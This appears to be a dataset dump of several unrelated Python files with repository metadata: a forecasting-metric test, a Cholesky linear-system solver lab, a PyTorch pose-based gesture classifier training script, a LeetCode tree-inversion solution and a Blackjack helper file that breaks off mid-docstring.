def test_metric_output_direct(metric, multioutput, n_columns):
    """Test output is of correct type, dependent on multioutput.

    Also tests that the two ways to call the metric yield equivalent results:
    1. using the __call__ dunder
    2. calling the evaluate method
    """
    y_pred = _make_series(n_columns=n_columns, n_timepoints=20, random_state=21)
    y_true = _make_series(n_columns=n_columns, n_timepoints=20, random_state=42)
    # coerce to DataFrame since _make_series does not return consisten output type
    y_pred = pd.DataFrame(y_pred)
    y_true = pd.DataFrame(y_true)
    res = dict()
    # Pass benchmark/train series too so relative metrics are satisfied.
    res[1] = metric(multioutput=multioutput)(
        y_true=y_true,
        y_pred=y_pred,
        y_pred_benchmark=y_pred,
        y_train=y_true,
    )
    res[2] = metric(multioutput=multioutput).evaluate(
        y_true=y_true,
        y_pred=y_pred,
        y_pred_benchmark=y_pred,
        y_train=y_true,
    )
    # uniform_average -> scalar; raw_values -> 1-D array, one entry per column.
    if multioutput == "uniform_average":
        assert all(isinstance(x, float) for x in res.values())
    elif multioutput == "raw_values":
        assert all(isinstance(x, np.ndarray) for x in res.values())
        assert all(x.ndim == 1 for x in res.values())
        assert all(len(x) == len(y_true.columns) for x in res.values())
    # assert results from all options are equal
    assert np.allclose(res[1], res[2])
| 0 | 0 | 0 |
19da141c48b7413d93cb25e65307a76b60c3d964 | 3,952 | py | Python | 4 term/MNA/Lab 3/main.py | mrojaczy/Labs | 21cd2ad3ddf8fa3b64cf253d147a4a04ad0667ab | [
"Apache-2.0"
] | 1 | 2020-03-15T17:11:23.000Z | 2020-03-15T17:11:23.000Z | 4 term/MNA/Lab 3/main.py | Asphobel/Labs | ee827143b32b691dd7736ba4888a4a9625b4694a | [
"Apache-2.0"
] | null | null | null | 4 term/MNA/Lab 3/main.py | Asphobel/Labs | ee827143b32b691dd7736ba4888a4a9625b4694a | [
"Apache-2.0"
] | null | null | null | import numpy as np
import numpy.linalg as la
import math
if __name__ == '__main__':
n = 4
matrixA = np.array([[3.738, 0.195, 0.275, 0.136],
[0.519, 5.002, 0.405, 0.283],
[0.306, 0.381, 4.812, 0.418],
[0.272, 0.142, 0.314, 3.935]])
matrixB = np.array([0.815, 0.191, 0.423, 0.352])
# n = int(input("Введите размерность системы уравнений "))
# print("Система уравнений будет иметь вид:")
# for i in range(n):
# for j in range(n):
# print("a{0}{1}*x{2}".format(i + 1, j + 1, j + 1), end="")
# if j != n - 1:
# print("+", end="")
# else:
# print("=", end="")
# print("b{0}".format(i + 1))
# matrixA = np.zeros((n, n))
# matrixB = np.zeros(n)
# for i in range(n):
# for j in range(n):
# matrixA[i][j] = input("a{0}{1}=".format(i + 1, j + 1))
# matrixB[i] = input("b{0}=".format(i + 1))
print("Система уравнений будет иметь вид:")
printSystemOfEquations(n, matrixA, matrixB)
squareRootMethod(n, matrixA, matrixB)
| 35.603604 | 88 | 0.527328 | import numpy as np
import numpy.linalg as la
import math
def squareRootMethod(n, matrixA, matrixB):
    """Solve A*x = b by the square-root (Cholesky) method.

    Checks solvability via the Kronecker-Capelli criterion, symmetrizes the
    system (A^T*A, A^T*b), factors the symmetric matrix as U^T*U, then
    solves by forward/back substitution. Also prints the determinant and
    the inverse of the symmetrized matrix. User-facing messages are printed
    in Russian (original program text, deliberately preserved).

    Args:
        n: dimension of the system.
        matrixA: (n, n) coefficient matrix.
        matrixB: (n,) right-hand-side vector.
    """
    # Kronecker-Capelli: rank([A|b]) != rank(A) -> no solutions;
    # rank(A) < n -> infinitely many solutions.
    extendedMatrix = np.column_stack((matrixA, matrixB))
    if la.matrix_rank(extendedMatrix) != la.matrix_rank(matrixA):
        print("Система не имеет решений")
        return
    elif la.matrix_rank(matrixA) != n:
        print("Система имеет бесконечно много решений")
        return
    # Symmetrize: A^T*A is symmetric positive definite, A^T*b the new RHS.
    matrixB = np.matmul(np.transpose(matrixA), matrixB)
    matrixA = np.matmul(np.transpose(matrixA), matrixA)
    print("После симметризации система уравнений будет иметь вид:")
    printSystemOfEquations(n, matrixA, matrixB)
    # Cholesky factorization A = U^T*U, computed in place in the upper triangle.
    matrixU = np.triu(matrixA)
    for i in range(n):
        for j in range(i):
            matrixU[i][i] -= matrixU[j][i] ** 2
        matrixU[i][i] = math.sqrt(matrixU[i][i])
        for j in range(i + 1, n):
            for k in range(i):
                matrixU[i][j] -= matrixU[k][i] * matrixU[k][j]
            matrixU[i][j] /= matrixU[i][i]
    # Forward substitution: U^T * y = b.
    matrixTransU = np.transpose(matrixU)
    matrixY = np.copy(matrixB)
    for i in range(n):
        for j in range(i):
            matrixY[i] -= matrixY[j] * matrixTransU[i][j]
        matrixY[i] /= matrixTransU[i][i]
    # Back substitution: U * x = y (rows processed bottom-up).
    matrixX = np.copy(matrixY)
    for i in range(n):
        for j in range(i):
            matrixX[n - 1 - i] -= matrixX[n - 1 - j] * matrixU[n - 1 - i][n - 1 - j]
        matrixX[n - 1 - i] /= matrixU[n - 1 - i][n - 1 - i]
    print("Решение:")
    for i in range(n):
        print("x{0}={1}".format(i + 1, matrixX[i]), end=" ")
    print("\n")
    # det of the symmetrized matrix: product of squared diagonal factors.
    determinant = 1
    for i in range(n):
        determinant *= matrixU[i][i] ** 2
    print("Определитель матрицы A равен: |A|={0}".format(determinant), end="\n\n")
    inverseMatrixA = calculateInverseMatrix(matrixU)
    print("Обратная матрица:")
    print(inverseMatrixA)
def calculateInverseMatrix(matrixU):
    """Invert A = U^T * U given its upper-triangular Cholesky factor U.

    For each unit vector e_k, solves U^T * y = e_k by forward substitution
    and then U * x = y by back substitution, so x is the k-th column of
    A^{-1}; the columns are stacked into the inverse.

    Args:
        matrixU: (n, n) upper-triangular Cholesky factor of A.

    Returns:
        (n, n) ndarray, the inverse of A.
    """
    # Bug fix: derive the dimension from the factor itself. The original read
    # the module-level `n`, which only exists when the file runs as a script,
    # so importing this function raised NameError.
    n = matrixU.shape[0]
    matrixTransU = np.transpose(matrixU)
    inverseMatrix = np.empty((n, 0))
    for k in range(n):
        matrixE = np.zeros(n)
        matrixE[k] = 1
        # Forward substitution: U^T * y = e_k.
        matrixY = np.copy(matrixE)
        for i in range(n):
            for j in range(i):
                matrixY[i] -= matrixY[j] * matrixTransU[i][j]
            matrixY[i] /= matrixTransU[i][i]
        # Back substitution: U * x = y (rows processed bottom-up).
        matrixX = np.copy(matrixY)
        for i in range(n):
            for j in range(i):
                matrixX[n - 1 - i] -= matrixX[n - 1 - j] * matrixU[n - 1 - i][n - 1 - j]
            matrixX[n - 1 - i] /= matrixU[n - 1 - i][n - 1 - i]
        inverseMatrix = np.column_stack((inverseMatrix, matrixX))
    return inverseMatrix
def printSystemOfEquations(n, matrixA, matrixB):
    """Pretty-print the linear system A*x = b, one equation per line,
    followed by a blank line."""
    for row in range(n):
        terms = "+".join(
            "{0}*x{1}".format(matrixA[row][col], col + 1) for col in range(n)
        )
        print("{0}={1}".format(terms, matrixB[row]))
    print()
if __name__ == '__main__':
    # Hard-coded 4x4 diagonally dominant test system A*x = b.
    n = 4
    matrixA = np.array([[3.738, 0.195, 0.275, 0.136],
                        [0.519, 5.002, 0.405, 0.283],
                        [0.306, 0.381, 4.812, 0.418],
                        [0.272, 0.142, 0.314, 3.935]])
    matrixB = np.array([0.815, 0.191, 0.423, 0.352])
    # Alternative (disabled): read the system interactively from the user.
    # n = int(input("Enter the dimension of the system of equations "))
    # print("The system of equations has the form:")
    # for i in range(n):
    #     for j in range(n):
    #         print("a{0}{1}*x{2}".format(i + 1, j + 1, j + 1), end="")
    #         if j != n - 1:
    #             print("+", end="")
    #         else:
    #             print("=", end="")
    #     print("b{0}".format(i + 1))
    # matrixA = np.zeros((n, n))
    # matrixB = np.zeros(n)
    # for i in range(n):
    #     for j in range(n):
    #         matrixA[i][j] = input("a{0}{1}=".format(i + 1, j + 1))
    #     matrixB[i] = input("b{0}=".format(i + 1))
    # Echo the system, then solve it by the square-root (Cholesky) method.
    print("Система уравнений будет иметь вид:")
    printSystemOfEquations(n, matrixA, matrixB)
    squareRootMethod(n, matrixA, matrixB)
| 2,886 | 0 | 69 |
a4e1c2123e1d9a7067b7fb0d3a9954f49505f739 | 9,003 | py | Python | popnn_torch.py | bhardwajRahul/Gesture-Recognition | e4722ecb58e5c65f34f92a21058eae81ed3c84e0 | [
"MIT"
] | 102 | 2018-11-03T03:39:10.000Z | 2022-03-31T03:11:54.000Z | popnn_torch.py | shuren007/Gesture-Recognition | e4722ecb58e5c65f34f92a21058eae81ed3c84e0 | [
"MIT"
] | 2 | 2019-06-14T14:03:49.000Z | 2020-04-20T12:14:27.000Z | popnn_torch.py | shuren007/Gesture-Recognition | e4722ecb58e5c65f34f92a21058eae81ed3c84e0 | [
"MIT"
] | 34 | 2018-12-13T23:20:53.000Z | 2022-01-09T16:37:34.000Z | # Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
''' Imports '''
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.optim.lr_scheduler import StepLR
import argparse
import random
import numpy as np
import time
from tqdm import tqdm
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
import operator
import os
import sys
import signal
from Var import Var
from DataLoader import DataLoader
import sklearn.model_selection as ms
import sklearn.preprocessing as pr
plt.switch_backend('agg')
use_cuda = torch.cuda.is_available()
v = Var()
num_classes = v.get_num_classes()
popnn_vars = v.get_POPNN()
class Model(nn.Module):
''' FC Neural Network '''
def forward(self, input):
''' Forward pass through network '''
output = input.view(-1, self.num_features * self.input_size)
output = self.drop(F.relu(self.fc1(output)))
output = self.drop(F.relu(self.fc2(output)))
output = self.drop(F.relu(self.fc3(output)))
output = self.drop(F.relu(self.fc4(output)))
output = F.logsigmoid(output)
return output
def accuracy(output, label):
''' Check if network output is equal to the corresponding label '''
max_idx, val = max(enumerate(output[0]), key=operator.itemgetter(1))
out = torch.zeros(1, num_classes).cuda() if use_cuda else torch.zeros(1, num_classes)
out[0][max_idx] = 1
if torch.eq(out.float(), label).byte().all():
return 1
else:
return 0
def train(model, optim, criterion, datum, label):
''' Modify weights based off cost from one datapoint '''
optim.zero_grad()
output = model(datum)
output = output.view(1, num_classes)
is_correct = accuracy(output, label)
loss = criterion(output, label)
loss.backward()
optim.step()
return loss.item(), is_correct
def test_accuracy(model, x_test, y_test):
''' Accuracy of Model on test data '''
num_correct = 0
for test, label in zip(x_test, y_test):
output = model(test.view(1, model.num_features, model.input_size))
is_correct = accuracy(output, label)
num_correct += is_correct
return num_correct / float(x_test.size()[0])
def create_plot(loss, train_acc, test_acc, num_epochs, plot_every, fn):
''' Creates graph of loss, training accuracy, and test accuracy '''
plt.figure()
fig, ax = plt.subplots()
x_ticks = range(plot_every, num_epochs + 1, plot_every)
y_ticks = np.arange(0, 1.1, 0.1)
plt.subplot(111)
plt.plot(x_ticks, loss, label="Average Loss")
plt.plot(x_ticks, train_acc, label="Training Accuracy")
plt.plot(x_ticks, test_acc, label="Validation Accuracy")
plt.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3,
ncol=2, mode="expand", borderaxespad=0.)
plt.xticks(x_ticks)
plt.yticks(y_ticks)
plt.axis([0, num_epochs, 0, 1])
plt.ylabel("Average Loss")
plt.xlabel("Epoch")
''' Save graph '''
plt.savefig(fn)
def train_iters(model, x_train, y_train, x_test, y_test, fn, lr=popnn_vars['lr'], batch_size=popnn_vars["batch_size"], num_epochs=popnn_vars["num_epochs"], print_every=popnn_vars['print_every'], plot_every=popnn_vars['plot_every']):
''' Trains neural net for numEpochs iters '''
num = fn.split('/')[-1].split('.')[0].split('popnn')[-1]
plot_fn = "graphs/popnn/lossAvg%s.png" % num
def sigint_handler(sig, iteration):
''' Handles Ctrl + C. Save the data into npz files. Data inputted into thenetwork '''
torch.save(model.state_dict(), fn)
create_plot(plot_loss_avgs, train_accuracies,
test_accuracies, num_epochs, plot_every, plot_fn)
print("Saving model and Exiting")
sys.exit(0)
''' Initialize sigint handler '''
signal.signal(signal.SIGINT, sigint_handler)
plot_loss_avgs = []
epochs = []
train_accuracies = []
test_accuracies = []
loss_total = 0
plot_loss_total = 0
num_correct = 0
plot_correct = 0
optimizer = optim.Adam(model.parameters(), lr=lr)
if gamma != None:
scheduler = StepLR(optimizer, step_size=300, gamma=gamma)
criterion = nn.BCEWithLogitsLoss()
y_train = torch.from_numpy(y_train).float().cuda(
) if use_cuda else torch.from_numpy(y_train).float()
x_train = torch.from_numpy(x_train).float().cuda(
) if use_cuda else torch.from_numpy(x_train).float()
y_test = torch.from_numpy(y_test).float().cuda(
) if use_cuda else torch.from_numpy(y_test).float()
x_test = torch.from_numpy(x_test).float().cuda(
) if use_cuda else torch.from_numpy(x_test).float()
for current_epoch in tqdm(range(num_epochs)):
if gamma != None:
scheduler.step()
for i in range(batch_size):
frame_num = random.randint(0, x_train.size()[0] - 1)
frame = x_train[frame_num].view(1, model.num_features, model.input_size)
label = y_train[frame_num].view(1, num_classes)
loss, is_correct = train(
model, optimizer, criterion, frame, label)
num_correct += is_correct
loss_total += loss
plot_correct += is_correct # Make a copy of numCorrect for plot_every
plot_loss_total += loss
if (current_epoch + 1) % print_every == 0:
avg_loss = loss_total / (print_every * batch_size)
train_acc = num_correct / float(print_every * batch_size)
test_acc = test_accuracy(model, x_test, y_test)
tqdm.write("[Epoch %d/%d] Avg Loss: %f, Training Acc: %f, Validation Acc: %f" %
(current_epoch + 1, num_epochs, avg_loss, train_acc, test_acc))
loss_total = 0
num_correct = 0
if (current_epoch + 1) % plot_every == 0:
plot_test_acc = test_accuracy(model, x_test, y_test)
plot_train_acc = plot_correct / float(plot_every * batch_size)
train_accuracies.append(plot_train_acc)
test_accuracies.append(plot_test_acc)
avg_loss = plot_loss_total / (plot_every * batch_size)
plot_loss_avgs.append(avg_loss)
epochs.append(current_epoch + 1)
plot_correct = 0
plot_loss_total = 0
create_plot(plot_loss_avgs, train_accuracies,
test_accuracies, num_epochs, plot_every, plot_fn)
if __name__ == "__main__":
''' Argparse Flags '''
parser = argparse.ArgumentParser(description='Fully Connected Feed Forward Net on tf-openpose data')
parser.add_argument("--transfer", "-t", dest="transfer", action="store_true")
parser.add_argument('--debug', dest='debug', action='store_true')
parser.add_argument("--ckpt-fn", "-c", dest="ckpt_fn",
type=str, default="popnn000.ckpt")
parser.add_argument("--save-fn", "-s", dest="save_fn",
type=str, default="popnn000.ckpt")
parser.add_argument("--learning-rate", "-lr",
dest="learning_rate", type=float, default=0.000035)
parser.add_argument("--num-epochs", "-e", dest="num_epochs",
type=int, default=1000, help='number of training iterations')
parser.add_argument("--batch-size", "-b", dest="batch_size", type=int,
default=256, help='number of training samples per epoch')
parser.add_argument('--num-frames', '-f', dest='num_frames', type=int, default=4,
help='number of consecutive frames where distances are accumulated')
parser.add_argument('--lr-decay-rate', '-d', dest='gamma', type=float, default=None)
parser.add_argument('--only-arm', '-o', dest='use_arm', action='store_true',
help="only use arm data")
parser.add_argument('--multiply-by-score', '-m', dest='m_score', action='store_true')
''' Set argparse defaults '''
parser.set_defaults(use_arm=False)
parser.set_defaults(transfer=False)
parser.set_defaults(debug=False)
parser.set_defaults(m_score=False)
''' Set variables to argparse arguments '''
args = parser.parse_args()
transfer = args.transfer
debug = args.debug
gamma = args.gamma
use_arm = args.use_arm
m_score = m_score
ckpt_fn = "lstmpts/popnn/%s" % args.ckpt_fn
fn = "lstmpts/popnn/%s" % args.save_fn
v = Var(use_arm)
input_size = v.get_size()
num_features = v.get_num_features()
dropout = popnn_vars['dropout']
model = Model(input_size=input_size, num_features=num_features, dropout=dropout)
model = model.cuda() if use_cuda else model
if transfer:
model.load_state_dict(torch.load(ckpt_fn))
print("Transfer Learning")
else:
print("Not Transfer Learning")
loader = DataLoader(args.num_frames, use_arm, m_score)
inp1, out1 = loader.load_all()
x_train, x_test, y_train, y_test = ms.train_test_split(
inp1, out1, test_size=0.15, random_state=23)
x_train = pr.normalize(x_train)
y_train = pr.normalize(y_train)
x_test = pr.normalize(x_test)
y_test = pr.normalize(y_test)
train_iters(model, x_train, y_train, x_test, y_test, fn)
torch.save(model.state_dict(), fn) | 34.494253 | 232 | 0.721315 | # Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
''' Imports '''
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.optim.lr_scheduler import StepLR
import argparse
import random
import numpy as np
import time
from tqdm import tqdm
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
import operator
import os
import sys
import signal
from Var import Var
from DataLoader import DataLoader
import sklearn.model_selection as ms
import sklearn.preprocessing as pr
# Non-interactive backend so plots can be written on headless machines.
plt.switch_backend('agg')
use_cuda = torch.cuda.is_available()
# Project-wide configuration: number of gesture classes and the POPNN
# hyperparameter dict (layer widths, lr, batch size, epoch counts, ...).
v = Var()
num_classes = v.get_num_classes()
popnn_vars = v.get_POPNN()
class Model(nn.Module):
    ''' Fully connected feed-forward classifier over flattened pose features. '''
    def __init__(self, input_size, num_features, dropout=0):
        """Build a 4-layer fully connected network.

        Args:
            input_size: number of keypoint values per feature channel.
            num_features: channels per keypoint (x and y is 2, only dist is 1).
            dropout: dropout probability applied after each hidden layer.
        """
        super(Model, self).__init__()
        self.input_size = input_size
        self.dropout = dropout
        self.num_features = num_features # using x and y is 2 features, only dist is 1, etc.
        # Hidden-layer widths come from the POPNN section of the Var config.
        self.hidden1 = popnn_vars["hidden1"]
        self.hidden2 = popnn_vars["hidden2"]
        self.hidden3 = popnn_vars["hidden3"]
        self.hidden4 = popnn_vars["hidden4"]
        self.fc1 = nn.Linear(self.num_features * self.input_size, self.hidden1)
        self.drop = nn.Dropout(p=dropout)
        self.fc2 = nn.Linear(self.hidden1, self.hidden2)
        self.fc3 = nn.Linear(self.hidden2, self.hidden3)
        self.fc4 = nn.Linear(self.hidden3, self.hidden4)
    def forward(self, input):
        ''' Forward pass: flatten, then 4x (linear -> ReLU -> dropout),
        finishing with logsigmoid. '''
        output = input.view(-1, self.num_features * self.input_size)
        output = self.drop(F.relu(self.fc1(output)))
        output = self.drop(F.relu(self.fc2(output)))
        output = self.drop(F.relu(self.fc3(output)))
        # NOTE(review): ReLU + dropout are applied to the final layer too, and
        # logsigmoid is applied even though train_iters pairs this model with
        # BCEWithLogitsLoss (which applies its own sigmoid) — confirm the
        # double squashing is intended.
        output = self.drop(F.relu(self.fc4(output)))
        output = F.logsigmoid(output)
        return output
def accuracy(output, label):
    ''' Return 1 if the arg-max of the network output matches the one-hot
    label, else 0. '''
    predicted = int(torch.argmax(output[0]))
    one_hot = torch.zeros(1, num_classes).cuda() if use_cuda else torch.zeros(1, num_classes)
    one_hot[0][predicted] = 1
    if torch.eq(one_hot.float(), label).byte().all():
        return 1
    return 0
def train(model, optim, criterion, datum, label):
    ''' Run one optimization step on a single (datum, label) pair.

    Returns (loss_value, is_correct) where is_correct is 1 when the
    prediction matched the one-hot label and 0 otherwise.
    '''
    optim.zero_grad()
    prediction = model(datum).view(1, num_classes)
    correct = accuracy(prediction, label)
    loss = criterion(prediction, label)
    loss.backward()
    optim.step()
    return loss.item(), correct
def test_accuracy(model, x_test, y_test):
    ''' Fraction of (x_test, y_test) pairs the model classifies correctly. '''
    hits = sum(
        accuracy(model(sample.view(1, model.num_features, model.input_size)), target)
        for sample, target in zip(x_test, y_test)
    )
    return hits / float(x_test.size()[0])
def create_plot(loss, train_acc, test_acc, num_epochs, plot_every, fn):
    ''' Creates graph of loss, training accuracy, and test accuracy.

    Each series holds one value per `plot_every` epochs, so all three must
    have num_epochs // plot_every entries. The y-axis is clamped to [0, 1]
    and the figure is written to `fn`.
    '''
    plt.figure()
    fig, ax = plt.subplots()
    # One x tick per recorded point: plot_every, 2*plot_every, ..., num_epochs.
    x_ticks = range(plot_every, num_epochs + 1, plot_every)
    y_ticks = np.arange(0, 1.1, 0.1)
    plt.subplot(111)
    plt.plot(x_ticks, loss, label="Average Loss")
    plt.plot(x_ticks, train_acc, label="Training Accuracy")
    plt.plot(x_ticks, test_acc, label="Validation Accuracy")
    # Legend above the axes, spanning the full plot width.
    plt.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3,
               ncol=2, mode="expand", borderaxespad=0.)
    plt.xticks(x_ticks)
    plt.yticks(y_ticks)
    plt.axis([0, num_epochs, 0, 1])
    plt.ylabel("Average Loss")
    plt.xlabel("Epoch")
    ''' Save graph '''
    plt.savefig(fn)
def train_iters(model, x_train, y_train, x_test, y_test, fn, lr=popnn_vars['lr'], batch_size=popnn_vars["batch_size"], num_epochs=popnn_vars["num_epochs"], print_every=popnn_vars['print_every'], plot_every=popnn_vars['plot_every']):
    ''' Train the model for num_epochs epochs of batch_size samples each.

    Each epoch draws batch_size random training frames (with replacement)
    and takes one single-sample optimization step per frame. Progress is
    logged every print_every epochs; loss/accuracy curves are accumulated
    every plot_every epochs and written as a plot at the end. Ctrl+C saves
    the model weights and the plot before exiting.

    NOTE(review): `gamma` (the LR-decay rate) is a module-level name that
    is only assigned in the __main__ block — confirm before calling this
    function from an importing module.
    '''
    # Derive the plot filename from the checkpoint filename's numeric suffix.
    num = fn.split('/')[-1].split('.')[0].split('popnn')[-1]
    plot_fn = "graphs/popnn/lossAvg%s.png" % num
    def sigint_handler(sig, iteration):
        ''' Handles Ctrl + C: saves the model checkpoint and the progress
        plot collected so far, then exits. '''
        torch.save(model.state_dict(), fn)
        create_plot(plot_loss_avgs, train_accuracies,
                    test_accuracies, num_epochs, plot_every, plot_fn)
        print("Saving model and Exiting")
        sys.exit(0)
    ''' Initialize sigint handler '''
    signal.signal(signal.SIGINT, sigint_handler)
    plot_loss_avgs = []
    epochs = []
    train_accuracies = []
    test_accuracies = []
    loss_total = 0
    plot_loss_total = 0
    num_correct = 0
    plot_correct = 0
    optimizer = optim.Adam(model.parameters(), lr=lr)
    # Optional step-wise LR decay, enabled when a decay rate was provided.
    if gamma != None:
        scheduler = StepLR(optimizer, step_size=300, gamma=gamma)
    criterion = nn.BCEWithLogitsLoss()
    # Move all data to tensors (and GPU when available) once, up front.
    y_train = torch.from_numpy(y_train).float().cuda(
    ) if use_cuda else torch.from_numpy(y_train).float()
    x_train = torch.from_numpy(x_train).float().cuda(
    ) if use_cuda else torch.from_numpy(x_train).float()
    y_test = torch.from_numpy(y_test).float().cuda(
    ) if use_cuda else torch.from_numpy(y_test).float()
    x_test = torch.from_numpy(x_test).float().cuda(
    ) if use_cuda else torch.from_numpy(x_test).float()
    for current_epoch in tqdm(range(num_epochs)):
        if gamma != None:
            scheduler.step()
        # One "epoch" = batch_size randomly sampled single-frame steps.
        for i in range(batch_size):
            frame_num = random.randint(0, x_train.size()[0] - 1)
            frame = x_train[frame_num].view(1, model.num_features, model.input_size)
            label = y_train[frame_num].view(1, num_classes)
            loss, is_correct = train(
                model, optimizer, criterion, frame, label)
            num_correct += is_correct
            loss_total += loss
            plot_correct += is_correct # Make a copy of numCorrect for plot_every
            plot_loss_total += loss
        # Periodic console logging (counters reset afterwards).
        if (current_epoch + 1) % print_every == 0:
            avg_loss = loss_total / (print_every * batch_size)
            train_acc = num_correct / float(print_every * batch_size)
            test_acc = test_accuracy(model, x_test, y_test)
            tqdm.write("[Epoch %d/%d] Avg Loss: %f, Training Acc: %f, Validation Acc: %f" %
                       (current_epoch + 1, num_epochs, avg_loss, train_acc, test_acc))
            loss_total = 0
            num_correct = 0
        # Periodic accumulation of the curves used for the final plot.
        if (current_epoch + 1) % plot_every == 0:
            plot_test_acc = test_accuracy(model, x_test, y_test)
            plot_train_acc = plot_correct / float(plot_every * batch_size)
            train_accuracies.append(plot_train_acc)
            test_accuracies.append(plot_test_acc)
            avg_loss = plot_loss_total / (plot_every * batch_size)
            plot_loss_avgs.append(avg_loss)
            epochs.append(current_epoch + 1)
            plot_correct = 0
            plot_loss_total = 0
    create_plot(plot_loss_avgs, train_accuracies,
                test_accuracies, num_epochs, plot_every, plot_fn)
if __name__ == "__main__":
    ''' Argparse Flags '''
    parser = argparse.ArgumentParser(description='Fully Connected Feed Forward Net on tf-openpose data')
    parser.add_argument("--transfer", "-t", dest="transfer", action="store_true")
    parser.add_argument('--debug', dest='debug', action='store_true')
    parser.add_argument("--ckpt-fn", "-c", dest="ckpt_fn",
                        type=str, default="popnn000.ckpt")
    parser.add_argument("--save-fn", "-s", dest="save_fn",
                        type=str, default="popnn000.ckpt")
    parser.add_argument("--learning-rate", "-lr",
                        dest="learning_rate", type=float, default=0.000035)
    parser.add_argument("--num-epochs", "-e", dest="num_epochs",
                        type=int, default=1000, help='number of training iterations')
    parser.add_argument("--batch-size", "-b", dest="batch_size", type=int,
                        default=256, help='number of training samples per epoch')
    parser.add_argument('--num-frames', '-f', dest='num_frames', type=int, default=4,
                        help='number of consecutive frames where distances are accumulated')
    parser.add_argument('--lr-decay-rate', '-d', dest='gamma', type=float, default=None)
    parser.add_argument('--only-arm', '-o', dest='use_arm', action='store_true',
                        help="only use arm data")
    parser.add_argument('--multiply-by-score', '-m', dest='m_score', action='store_true')
    ''' Set argparse defaults '''
    parser.set_defaults(use_arm=False)
    parser.set_defaults(transfer=False)
    parser.set_defaults(debug=False)
    parser.set_defaults(m_score=False)
    ''' Set variables to argparse arguments '''
    args = parser.parse_args()
    transfer = args.transfer
    debug = args.debug
    gamma = args.gamma
    use_arm = args.use_arm
    # Bug fix: was `m_score = m_score`, a self-assignment of a not-yet-defined
    # name that raised NameError before training could start.
    m_score = args.m_score
    ckpt_fn = "lstmpts/popnn/%s" % args.ckpt_fn
    fn = "lstmpts/popnn/%s" % args.save_fn
    # Re-read the config with the arm-only flag so sizes match the data.
    v = Var(use_arm)
    input_size = v.get_size()
    num_features = v.get_num_features()
    dropout = popnn_vars['dropout']
    model = Model(input_size=input_size, num_features=num_features, dropout=dropout)
    model = model.cuda() if use_cuda else model
    if transfer:
        model.load_state_dict(torch.load(ckpt_fn))
        print("Transfer Learning")
    else:
        print("Not Transfer Learning")
    # Load all pose data, split train/validation, and L2-normalize rows.
    loader = DataLoader(args.num_frames, use_arm, m_score)
    inp1, out1 = loader.load_all()
    x_train, x_test, y_train, y_test = ms.train_test_split(
        inp1, out1, test_size=0.15, random_state=23)
    x_train = pr.normalize(x_train)
    y_train = pr.normalize(y_train)
    x_test = pr.normalize(x_test)
    y_test = pr.normalize(y_test)
    train_iters(model, x_train, y_train, x_test, y_test, fn)
    torch.save(model.state_dict(), fn)
f167c13fb9a6fa79b72ac03dc561d070112c7b79 | 1,214 | py | Python | 226.invert-binary-tree.py | windard/leeeeee | 0107a5f95746592ca4fe78d2b5875cf65b1910e7 | [
"MIT"
] | null | null | null | 226.invert-binary-tree.py | windard/leeeeee | 0107a5f95746592ca4fe78d2b5875cf65b1910e7 | [
"MIT"
] | null | null | null | 226.invert-binary-tree.py | windard/leeeeee | 0107a5f95746592ca4fe78d2b5875cf65b1910e7 | [
"MIT"
] | null | null | null | #
# @lc app=leetcode id=226 lang=python
#
# [226] Invert Binary Tree
#
# https://leetcode.com/problems/invert-binary-tree/description/
#
# algorithms
# Easy (56.72%)
# Total Accepted: 297.1K
# Total Submissions: 522.5K
# Testcase Example: '[4,2,7,1,3,6,9]'
#
# Invert a binary tree.
#
# Example:
#
# Input:
#
#
# 4
# / \
# 2 7
# / \ / \
# 1 3 6 9
#
# Output:
#
#
# 4
# / \
# 7 2
# / \ / \
# 9 6 3 1
#
# Trivia:
# This problem was inspired by this original tweet by Max Howell:
#
# Google: 90% of our engineers use the software you wrote (Homebrew), but you
# can’t invert a binary tree on a whiteboard so f*** off.
#
#
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
| 18.393939 | 77 | 0.553542 | #
# @lc app=leetcode id=226 lang=python
#
# [226] Invert Binary Tree
#
# https://leetcode.com/problems/invert-binary-tree/description/
#
# algorithms
# Easy (56.72%)
# Total Accepted: 297.1K
# Total Submissions: 522.5K
# Testcase Example: '[4,2,7,1,3,6,9]'
#
# Invert a binary tree.
#
# Example:
#
# Input:
#
#
# 4
# / \
# 2 7
# / \ / \
# 1 3 6 9
#
# Output:
#
#
# 4
# / \
# 7 2
# / \ / \
# 9 6 3 1
#
# Trivia:
# This problem was inspired by this original tweet by Max Howell:
#
# Google: 90% of our engineers use the software you wrote (Homebrew), but you
# can’t invert a binary tree on a whiteboard so f*** off.
#
#
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def invertTree(self, root):
"""
:type root: TreeNode
:rtype: TreeNode
"""
if not root:
return
root.left, root.right = root.right, root.left
if root.left:
self.invertTree(root.left)
if root.right:
self.invertTree(root.right)
return root
| 0 | 351 | 23 |
ea3a96f8d11422a1ee7342ce72973227c97bad62 | 476 | py | Python | Blackjack/functions.py | Peter380/Python | 03b6cfda249cd538711d6a047a2e852dc91f84c5 | [
"MIT"
] | null | null | null | Blackjack/functions.py | Peter380/Python | 03b6cfda249cd538711d6a047a2e852dc91f84c5 | [
"MIT"
] | null | null | null | Blackjack/functions.py | Peter380/Python | 03b6cfda249cd538711d6a047a2e852dc91f84c5 | [
"MIT"
] | null | null | null | import os
#Functions for Blackjack
| 22.666667 | 82 | 0.596639 | import os
#Functions for Blackjack
def display_players_cards(Player):
    """Print every card currently held in the given player's hand, one per line."""
    held_cards = Player.hand
    for held_card in held_cards:
        print(held_card)
def get_players_bet():
    """Prompt the user for a whole-number bet and return it as an int.

    Re-prompts on non-numeric input instead of crashing.
    """
    while True:
        try:
            return int(input("How much are you betting? Please insert a number: "))
        except ValueError:
            # Was a bare `except:`, which also swallowed KeyboardInterrupt
            # and SystemExit, making the prompt loop impossible to abort.
            print("This is not a number. Please insert a number")
def clear():
    """Clear the terminal screen.

    Portable fix: the original always ran 'cls', which only exists on
    Windows; on other platforms the shell command simply failed.
